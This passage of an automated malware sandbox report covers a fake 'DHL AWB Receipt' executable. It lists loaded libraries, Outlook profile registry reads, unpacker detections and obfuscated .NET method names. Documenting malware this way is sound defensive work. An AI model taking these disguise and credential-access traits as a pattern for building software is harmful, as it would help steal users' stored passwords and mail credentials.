                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: mlang.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: cryptbase.dll
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeSection loaded: wininet.dll
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeSection loaded: mswsock.dll
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeSection loaded: dnsapi.dll
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeSection loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeSection loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: DHL AWB Receipt_pdf.bat.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: DHL AWB Receipt_pdf.bat.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: DHL AWB Receipt_pdf.bat.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: EhStorAuthn.pdbGCTL source: RegSvcs.exe, 0000000A.00000002.2481415906.0000000000B48000.00000004.00000020.00020000.00000000.sdmp, ctd5Fl0jEEYLVK.exe, 0000000E.00000002.4687129430.000000000073E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb, source: EhStorAuthn.exe, 00000012.00000002.4686720826.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000012.00000002.4688612074.000000000521C000.00000004.10000000.00040000.00000000.sdmp, ctd5Fl0jEEYLVK.exe, 00000014.00000002.4688182226.00000000029FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2783296706.000000002336C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000A.00000002.2482295346.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000012.00000002.4688190517.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000012.00000002.4688190517.0000000004D8E000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000012.00000003.2480821432.0000000004880000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000012.00000003.2483621408.0000000004A47000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000A.00000002.2482295346.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000012.00000002.4688190517.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000012.00000002.4688190517.0000000004D8E000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000012.00000003.2480821432.0000000004880000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000012.00000003.2483621408.0000000004A47000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: EhStorAuthn.pdb source: RegSvcs.exe, 0000000A.00000002.2481415906.0000000000B48000.00000004.00000020.00020000.00000000.sdmp, ctd5Fl0jEEYLVK.exe, 0000000E.00000002.4687129430.000000000073E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb source: EhStorAuthn.exe, 00000012.00000002.4686720826.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000012.00000002.4688612074.000000000521C000.00000004.10000000.00040000.00000000.sdmp, ctd5Fl0jEEYLVK.exe, 00000014.00000002.4688182226.00000000029FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2783296706.000000002336C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ctd5Fl0jEEYLVK.exe, 0000000E.00000002.4686746546.000000000045F000.00000002.00000001.01000000.0000000D.sdmp, ctd5Fl0jEEYLVK.exe, 00000014.00000002.4686554692.000000000045F000.00000002.00000001.01000000.0000000D.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.6a20000.4.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.25e8584.0.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, mT0HU9WLYQiSL4lvDj.cs.Net Code: PlfRYdQVVr System.Reflection.Assembly.Load(byte[])
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, mT0HU9WLYQiSL4lvDj.cs.Net Code: PlfRYdQVVr System.Reflection.Assembly.Load(byte[])
                Source: 11.2.oSJLRdDbLeQ.exe.341853c.0.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: DHL AWB Receipt_pdf.bat.exeStatic PE information: 0xC75FA85A [Mon Dec 30 12:36:42 2075 UTC]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_004071FF push C35DE58Bh; ret 10_2_00407237
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00403260 push eax; ret 10_2_00403262
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00408395 push ss; ret 10_2_00408397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_004124E9 push eax; retf 10_2_004124EA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0040B528 pushad ; retf 10_2_0040B52A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0040D53D push esi; retf 10_2_0040D53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0041ED9A pushad ; retf 10_2_0041ED9B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0041ED9E pushad ; iretd 10_2_0041EDA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_004146A6 push cs; iretd 10_2_004146BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD09AD push ecx; mov dword ptr [esp], ecx10_2_00FD09B6
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeCode function: 11_2_0732D6A0 pushfd ; iretd 11_2_0732D6AD
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeCode function: 11_2_0732A842 push esp; iretd 11_2_0732A849
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeCode function: 11_2_0732A888 pushfd ; iretd 11_2_0732A891
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeCode function: 11_2_07330DF8 push eax; ret 11_2_07330DF9
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeCode function: 11_2_0733E4A8 pushfd ; retf 11_2_0733E4B5
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeCode function: 11_2_0733D9F1 push esp; retf 11_2_0733D9FD
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeCode function: 14_2_0576295A push eax; retf 14_2_0576295B
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeCode function: 14_2_0575D9AE push esi; retf 14_2_0575D9AF
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeCode function: 14_2_0575B999 pushad ; retf 14_2_0575B99B
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeCode function: 14_2_05758806 push ss; ret 14_2_05758808
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeCode function: 14_2_05764B1F push cs; iretd 14_2_05764B2D
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeCode function: 14_2_05764A8D push ebp; iretd 14_2_05764A8E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014EC54F push 8B014767h; ret 17_2_014EC554
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014EC54D pushfd ; ret 17_2_014EC54E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014EC9D7 push edi; ret 17_2_014EC9D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014A09AD push ecx; mov dword ptr [esp], ecx17_2_014A09B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0147135E push eax; iretd 17_2_01471369
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01471FEC push eax; iretd 17_2_01471FED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014F7E99 push ecx; ret 17_2_014F7EAC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0042E0DA push ds; iretd 17_2_0042E0E1
                Source: DHL AWB Receipt_pdf.bat.exeStatic PE information: section name: .text entropy: 7.795152454250888
                Source: oSJLRdDbLeQ.exe.0.drStatic PE information: section name: .text entropy: 7.795152454250888
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, qUcbjwDU290xnjVMSr.csHigh entropy of concatenated method names: 'sioeby0FaC', 'xT8eE3c1TO', 'QWQeTbPSvM', 'Ht7emLJeB6', 'j11eobu2iu', 'IJ7ex8o3ff', 'zrCeylcnrj', 'gVOeHY92NQ', 'lWme7aL33Y', 'JEJePs0ufR'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, aewrsNzAkF7Zt957j0.csHigh entropy of concatenated method names: 'P52nL5AgxN', 'zYNnbvVY8u', 'D0PnE86Jkd', 'hUZnTGQiBR', 'y9TnmJZfTh', 'NqsnoFcp2b', 'XZinx5rDW2', 'WBqnB5HxFu', 'ThrnttA1Z3', 'StynrsF6ys'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, zqBecF9CmkYcY2mlES.csHigh entropy of concatenated method names: 'oSUOgGBdvx', 'y8ROqRW75b', 'ToString', 'dyeOlaFQd2', 'b6EOQliDLe', 'VjKO0NZK1A', 'ATcOdIMvwj', 'GBWOpakLcq', 'MT5OhdhEnv', 'JfHOWZnCn7'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, YwrZhpQ4tCcrBZV0Xd.csHigh entropy of concatenated method names: 'Dispose', 'PW9UwLDH0j', 'vhuAmfhnyG', 'mF5wJB54CX', 'fnuU4IK6Kn', 'CNsUzy3xVG', 'ProcessDialogKey', 'zrcASr8skD', 'V5RAUAoxMf', 'XOWAAkSfqg'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, A0Hwvw0L22AZTNaH4W.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'SfEAwFdO7I', 'DMGA4kcHWU', 'qnBAz00OV0', 'FKI8S0H9TO', 'Y4u8UOoRlR', 'k9N8A89BQt', 'v6Z88nOhfD', 'asDBaXMOJpABNZUnOS8'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, mT0HU9WLYQiSL4lvDj.csHigh entropy of concatenated method names: 'ia48u0GEPv', 'RJD8l9tYol', 'H6F8QawU0I', 'iNc804OyKy', 'Tye8diOwVt', 'RR28pY4eIO', 'gwI8hSsxxX', 'Hes8WWc3xP', 'WvL81nsqjb', 'd3M8gZao4N'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, Mr8skDwk5RAoxMfwOW.csHigh entropy of concatenated method names: 'j4GFTGdDaE', 'zNvFmoE2G5', 'hmGFCTSjN2', 'hUsFoYdqDE', 'sotFxLmZr9', 'DlMFZuRVsQ', 'P9VFywP8ZI', 'RUoFHlN5PD', 'OtqFc5Dcln', 'PnnF7htGOM'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, vQRBoxT1Igvqdu4vPu.csHigh entropy of concatenated method names: 'AnYpuNfiu2', 'EYNpQOEvxe', 'oNjpdvAmkp', 'TgOphUaJuy', 'It6pWwOTdv', 'JB3djQA24I', 'cNQdkjtypc', 'WgFd6fAtaW', 'bgkdVTUEFx', 'edtdwuLjhc'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, w5em9R61cXW9LDH0jl.csHigh entropy of concatenated method names: 'OliF3WguLG', 'NpMFOpbaG2', 'Le6FFKYi9F', 'FsVFvKbRDc', 'qCcFsAbjHa', 'nJmFBIfuhb', 'Dispose', 'stMIlV4RAQ', 'xxfIQxcENW', 'XPcI027xZt'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, EVTGXTkHI1iSerBPcM.csHigh entropy of concatenated method names: 'VHMOVl73cw', 'gy0O4WjHuF', 'IUbISn6DvU', 'JjOIUHbqEc', 'K5nOP2534D', 'LZ6OXXxIw8', 'qXBODG80gC', 'xUtOfegh0k', 'QHgO5lW4L4', 'BUYOipaYJF'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, vMv8YXAWuhbjim5oX7.csHigh entropy of concatenated method names: 'qwDYMZ6bD', 'gUVaC5NxO', 'rEJLjGypl', 'rOkGYGOgn', 'NviExCIFn', 'PIMNEgLMa', 'B0AraTWCYrwYClcDLA', 'tJfQ2wd7NNTh7YbRLj', 'Ue4IrN7XO', 'e2OnwvJUn'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, wq3GEtUUjbmFhdgqEuP.csHigh entropy of concatenated method names: 'w4en4l2QA2', 'bSbnzKbt25', 'NsGvSlmXhj', 'MXTvUIgmrJ', 'oylvAn2NIg', 'DBqv8WX74I', 'Ks9vRQUivV', 'dTmvu8yZHG', 'uKRvl3K0Mv', 'YhRvQEUiZX'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, USfqgP4cjdD6wgSd9w.csHigh entropy of concatenated method names: 'gHyn00llvL', 'zMQnd3OsA9', 'FfHnpmpjF5', 'iCgnhPLkCK', 'tUhnF4dXt3', 'awWnWftWHO', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, kQyDFPb4c01tALIVTH.csHigh entropy of concatenated method names: 'fSfQfKqUrp', 'wdnQ5l6hKP', 'JGqQiW2GiD', 'zCWQ9pOAof', 'IelQjlUnua', 'LLpQkAJAOi', 'Y8JQ6oPh9s', 'wQvQV1G3yC', 'Ws6QwmAM2J', 'hjHQ42FNPe'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, RxAgtEfHqZkTkCVG0f.csHigh entropy of concatenated method names: 'eQD37ICfDo', 'wtB3XiwOSZ', 'gfw3fQG32L', 'S5835h85Sj', 'Sm03mYnkay', 'su33Cp67iq', 'mMg3orFyOL', 'ek83xDdpPi', 'TEg3Zbhy63', 'V4v3y1YhyF'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, I3Q6vVURQGf9yWOYoNP.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QMA2FKn0nD', 'L1t2nIwLny', 'a7x2vc6i4R', 'Qv022LxQ00', 'Nnr2sWhO04', 'qGq2MhljDr', 'bdr2BYUMpP'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, sT2jQYEBPVZa53MGQm.csHigh entropy of concatenated method names: 'UqX0aZjUpJ', 'Nq60L4M5M4', 'uGq0b0xbwt', 'EGh0ElHtqm', 'b7e03m9OG3', 'Bun0JwhV5N', 'Ea70OkKWrC', 'Sdd0IshVuj', 'v9l0F7lAyw', 'Qfh0n2RjC4'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, W8hyW3yZl5RbMg6Z2l.csHigh entropy of concatenated method names: 'RXuhliTX5v', 'iXbh0u8xx9', 'NZmhpokAXo', 'LMAp4w9XyR', 'N9ZpzDl0Dk', 'JDhhSxTJ6Y', 'rD3hUFYwaM', 'XbihARcbKw', 'UTOh80Unr3', 'wE6hRoNcEV'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, rH1MMPNnIxKWXJ4Nrs.csHigh entropy of concatenated method names: 'VEwdKrtqcT', 'hvSdGoWlIM', 'coP0CAECa5', 'qF90oN2D6q', 'A890x2uDIn', 'Ijj0ZrmH0o', 'C2j0y8TZH0', 'kbM0HiClfY', 'HZe0cT7yaU', 'LbF07qafNB'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, AOwxT7iFU3JBbiw75C.csHigh entropy of concatenated method names: 'ToString', 'zm3JPw5lqj', 'O87JmpuiQU', 'LIDJCuSA9j', 'aDkJo5Zp3h', 'RV6Jxl2OuY', 'NdPJZMS6X6', 'BT2JyBA03X', 'gp2JHWDGgQ', 'BA9Jcv48lO'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, mGeAMkc9LMVR8hrHaX.csHigh entropy of concatenated method names: 'MohhtnDkht', 'iUchrERDXh', 'mZShYay6s0', 'uZ5hamGZYu', 'GtnhKFORII', 'H7ChLYMbrm', 'mbrhGNsZ53', 'edMhbuHeSH', 'YBMhEHf4SB', 'o6ghNsdpxM'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, TD50XXRUSsUxUojIZN.csHigh entropy of concatenated method names: 'hWWUhQyDFP', 'Yc0UW1tALI', 'zBPUgVZa53', 'wGQUqmFH1M', 'p4NU3rssQR', 'woxUJ1Igvq', 'dSDqlj0MgwaZg20pIQ', 'a06Z3JKgrKbvfc9Suv', 'I5tUUxN0E4', 'WylU80hV6C'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, qUcbjwDU290xnjVMSr.csHigh entropy of concatenated method names: 'sioeby0FaC', 'xT8eE3c1TO', 'QWQeTbPSvM', 'Ht7emLJeB6', 'j11eobu2iu', 'IJ7ex8o3ff', 'zrCeylcnrj', 'gVOeHY92NQ', 'lWme7aL33Y', 'JEJePs0ufR'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, aewrsNzAkF7Zt957j0.csHigh entropy of concatenated method names: 'P52nL5AgxN', 'zYNnbvVY8u', 'D0PnE86Jkd', 'hUZnTGQiBR', 'y9TnmJZfTh', 'NqsnoFcp2b', 'XZinx5rDW2', 'WBqnB5HxFu', 'ThrnttA1Z3', 'StynrsF6ys'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, zqBecF9CmkYcY2mlES.csHigh entropy of concatenated method names: 'oSUOgGBdvx', 'y8ROqRW75b', 'ToString', 'dyeOlaFQd2', 'b6EOQliDLe', 'VjKO0NZK1A', 'ATcOdIMvwj', 'GBWOpakLcq', 'MT5OhdhEnv', 'JfHOWZnCn7'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, YwrZhpQ4tCcrBZV0Xd.csHigh entropy of concatenated method names: 'Dispose', 'PW9UwLDH0j', 'vhuAmfhnyG', 'mF5wJB54CX', 'fnuU4IK6Kn', 'CNsUzy3xVG', 'ProcessDialogKey', 'zrcASr8skD', 'V5RAUAoxMf', 'XOWAAkSfqg'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, A0Hwvw0L22AZTNaH4W.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'SfEAwFdO7I', 'DMGA4kcHWU', 'qnBAz00OV0', 'FKI8S0H9TO', 'Y4u8UOoRlR', 'k9N8A89BQt', 'v6Z88nOhfD', 'asDBaXMOJpABNZUnOS8'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, mT0HU9WLYQiSL4lvDj.csHigh entropy of concatenated method names: 'ia48u0GEPv', 'RJD8l9tYol', 'H6F8QawU0I', 'iNc804OyKy', 'Tye8diOwVt', 'RR28pY4eIO', 'gwI8hSsxxX', 'Hes8WWc3xP', 'WvL81nsqjb', 'd3M8gZao4N'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, Mr8skDwk5RAoxMfwOW.csHigh entropy of concatenated method names: 'j4GFTGdDaE', 'zNvFmoE2G5', 'hmGFCTSjN2', 'hUsFoYdqDE', 'sotFxLmZr9', 'DlMFZuRVsQ', 'P9VFywP8ZI', 'RUoFHlN5PD', 'OtqFc5Dcln', 'PnnF7htGOM'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, vQRBoxT1Igvqdu4vPu.csHigh entropy of concatenated method names: 'AnYpuNfiu2', 'EYNpQOEvxe', 'oNjpdvAmkp', 'TgOphUaJuy', 'It6pWwOTdv', 'JB3djQA24I', 'cNQdkjtypc', 'WgFd6fAtaW', 'bgkdVTUEFx', 'edtdwuLjhc'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, w5em9R61cXW9LDH0jl.csHigh entropy of concatenated method names: 'OliF3WguLG', 'NpMFOpbaG2', 'Le6FFKYi9F', 'FsVFvKbRDc', 'qCcFsAbjHa', 'nJmFBIfuhb', 'Dispose', 'stMIlV4RAQ', 'xxfIQxcENW', 'XPcI027xZt'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, EVTGXTkHI1iSerBPcM.csHigh entropy of concatenated method names: 'VHMOVl73cw', 'gy0O4WjHuF', 'IUbISn6DvU', 'JjOIUHbqEc', 'K5nOP2534D', 'LZ6OXXxIw8', 'qXBODG80gC', 'xUtOfegh0k', 'QHgO5lW4L4', 'BUYOipaYJF'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, vMv8YXAWuhbjim5oX7.csHigh entropy of concatenated method names: 'qwDYMZ6bD', 'gUVaC5NxO', 'rEJLjGypl', 'rOkGYGOgn', 'NviExCIFn', 'PIMNEgLMa', 'B0AraTWCYrwYClcDLA', 'tJfQ2wd7NNTh7YbRLj', 'Ue4IrN7XO', 'e2OnwvJUn'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, wq3GEtUUjbmFhdgqEuP.csHigh entropy of concatenated method names: 'w4en4l2QA2', 'bSbnzKbt25', 'NsGvSlmXhj', 'MXTvUIgmrJ', 'oylvAn2NIg', 'DBqv8WX74I', 'Ks9vRQUivV', 'dTmvu8yZHG', 'uKRvl3K0Mv', 'YhRvQEUiZX'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, USfqgP4cjdD6wgSd9w.csHigh entropy of concatenated method names: 'gHyn00llvL', 'zMQnd3OsA9', 'FfHnpmpjF5', 'iCgnhPLkCK', 'tUhnF4dXt3', 'awWnWftWHO', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, kQyDFPb4c01tALIVTH.csHigh entropy of concatenated method names: 'fSfQfKqUrp', 'wdnQ5l6hKP', 'JGqQiW2GiD', 'zCWQ9pOAof', 'IelQjlUnua', 'LLpQkAJAOi', 'Y8JQ6oPh9s', 'wQvQV1G3yC', 'Ws6QwmAM2J', 'hjHQ42FNPe'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, RxAgtEfHqZkTkCVG0f.csHigh entropy of concatenated method names: 'eQD37ICfDo', 'wtB3XiwOSZ', 'gfw3fQG32L', 'S5835h85Sj', 'Sm03mYnkay', 'su33Cp67iq', 'mMg3orFyOL', 'ek83xDdpPi', 'TEg3Zbhy63', 'V4v3y1YhyF'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, I3Q6vVURQGf9yWOYoNP.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QMA2FKn0nD', 'L1t2nIwLny', 'a7x2vc6i4R', 'Qv022LxQ00', 'Nnr2sWhO04', 'qGq2MhljDr', 'bdr2BYUMpP'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, sT2jQYEBPVZa53MGQm.csHigh entropy of concatenated method names: 'UqX0aZjUpJ', 'Nq60L4M5M4', 'uGq0b0xbwt', 'EGh0ElHtqm', 'b7e03m9OG3', 'Bun0JwhV5N', 'Ea70OkKWrC', 'Sdd0IshVuj', 'v9l0F7lAyw', 'Qfh0n2RjC4'
